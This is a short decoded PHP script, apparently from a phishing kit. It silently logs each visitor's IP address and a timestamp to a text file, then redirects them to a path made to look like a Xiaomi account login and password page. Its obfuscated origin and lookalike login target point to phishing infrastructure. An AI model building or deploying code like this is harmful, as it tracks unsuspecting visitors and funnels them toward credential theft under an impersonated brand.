/* Decoded by unphp.net */ // Get the visitor's IP address $ip = $_SERVER['REMOTE_ADDR']; // Get the current date and time $datetime = date("Y-m-d H:i:s"); // Store the visitor's information in a text file $file = "visitors.txt"; $visitor_info = $datetime . " | " . $ip . " "; file_put_contents($file, $visitor_info, FILE_APPEND | LOCK_EX); // Redirect the visitor to the desired page header("Location: account.login.xiaomi.com/fee/services/logins/passwords"); exit;